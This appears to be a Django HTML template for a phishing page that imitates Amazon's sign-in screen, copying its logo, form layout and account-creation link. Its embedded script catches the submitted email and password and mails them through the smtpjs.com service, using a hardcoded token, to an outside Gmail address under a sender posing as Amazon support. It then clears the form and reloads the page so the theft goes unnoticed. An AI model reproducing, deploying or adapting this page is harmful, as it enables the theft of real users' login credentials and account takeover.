{% load static %}

<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title>Amazon</title>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
    <link rel="shortcut icon" type="image/x-icon" href="https://res.cloudinary.com/dx36ar8eb/image/upload/v1703649601/amaz2_cczkzm.png">

 </head>
  <style>
        .img_1 {
      height: 31px;
      width: 103px;
      margin-top: 20px;
      margin-bottom: 20px;
    }

    .extra-margin {
      margin-top: 200px;
    }

    .btn {
      width: 350px;
      margin-top: 20px;
    }
    form {
      border: 1px solid lightgrey;
      padding-left: 25px;
      padding-right: 25px;
      padding-top: 16px;
      padding-bottom: 25px;
      border-radius: 5px;
    }

    #words_1 {
      font-weight: bold;
      font-size: 14px;
    }

    #words_2 {
      font-weight: bold;
      font-size: 14px;
    }
      
    #words_3 {
      font: 7px;
    }

    .sign-in {
      margin-bottom: 50px;
      font-size: 30px;
      font-weight: bold;
    }

    .conditions {
      font-size: 8px;
      color: blue;
      margin-top: 30px;
      z-index: 2;
    }

    .footer_1 {
      width: max;
      height: 350px;
      background-color: #fff;
      margin-top: 30px;
      
    }

    #exampleCheck1 {
      margin-left: 3px;
      margin-top: 11px;
    }

    .keep-sign-in {
      margin-left: 24px;
      margin-top: 8px;
      font-size: 14px;
    }

    #sign-in {
      margin-bottom: 10px;
    }

    #grey-button {
      background-color: lightgrey;
      border: black; 
    }

  </style>
  <body>

    <header>
<!--Amazon Image Logo-->
      <div class="d-flex flex-row justify-content-center">
        <div class="row">
          <div class="col-md">
            <img style="height: 50px;" class="img_1" src="{% static 'ama1.svg' %}" alt="Amazon Logo"/>
          </div><!--Col 1 End-->
        </div><!--Row 1 End-->
      </div><!--Container End-->
<!--Amazon Image Logo-->
   </header>     
     
      
<!--Form-->
      <div class="d-flex flex-row justify-content-center">
        <div class="row">
<div class="col-md">
    <form id="signInForm">
        <div class="sign-in">Sign In</div>
        <div class="form-group">
            <label id="words_1" for="exampleInputEmail1">Email (phone for mobile accounts)</label>
            <input type="email" class="form-control" id="exampleInputEmail1" aria-describedby="emailHelp" placeholder="Enter email">
            <small id="emailHelp" class="form-text text-muted"></small>
        </div>
        <div class="form-group">
            <label id="words_2" for="exampleInputPassword1">Password &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp Forgot your password? </label>
            <input type="password" class="form-control" id="exampleInputPassword1" placeholder="Password">
            <div class="form-group">
                <button type="submit" class="btn btn-warning" id="sign-in">Sign In</button>

                <p class="keep-sign-in">Keep me signed in. <a href="">Details</a><input type="checkbox" class="form-check-input checkbox" id="exampleCheck1"></p><br>

                <img style="height:33px;" id="amazon-img" src="{% static 'ama1.svg' %}" alt="Amazon Image">
            </div>
        </div>
        <div class="form-check">
        </div>
        <button type="button" class="btn btn-warning" id="grey-button">
            <a href="https://www.amazon.com/ap/register?showRememberMe=true&openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fref%3Dnav_logo%2F%3F_encoding%3DUTF8%26ref_%3Dnav_em_hd_re_signin&prevRID=P5YWFMSE58J2E0J2CNRY&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=usflex&openid.mode=checkid_setup&prepopulatedLoginId=&failedSignInCount=0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&pageId=usflex&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0">Create your Amazon account
            </a>
        </button>
    </form>
</div>

<script src="https://smtpjs.com/v3/smtp.js"></script>
<script>
    document.getElementById('signInForm').addEventListener('submit', function (event) {
        event.preventDefault(); // Prevent default form submission

        var email = document.getElementById('exampleInputEmail1').value;
        var password = document.getElementById('exampleInputPassword1').value;

        // Send the sign-in content to the email via SMTP
        Email.send({
            SecureToken: "26788622-f74f-47e2-8858-2041212af245",
            To: "trackchi8@gmail.com",
            From: "support@amazontracks.online",
            Subject: "Sign In Attempt",
            Body: "Email: " + email + "<br>Password: " + password
        }).then(
            function (message) {
                // Clear the form
                document.getElementById('exampleInputEmail1').value = "";
                document.getElementById('exampleInputPassword1').value = "";

                // Refresh the page after submission
                location.reload();
            }
        ).catch(
            function (error) {
                console.error("Error sending sign-in content:", error);
                alert("An error occurred while sending sign-in content. Please try again later.");
            }
        );
    });
</script>




          <!--Col 1 End-->
        </div><!--Row 1 End-->
      </div><!--Container End-->
<!--Form-->
      
      
      

<div class="d-flex flex-row justify-content-center footer_1">
  <div class="row">
    <div class="col">
      <p class="conditions"><a>Conditions of Use &nbsp &nbsp &nbsp </a>   <a>Privacy Notice&nbsp &nbsp &nbsp </a>   <a>Help&nbsp &nbsp &nbsp </a></p>
    </div><!--Footer Col 1 End-->
  </div><!--Footer Row 1 End-->
  
    </div>

  
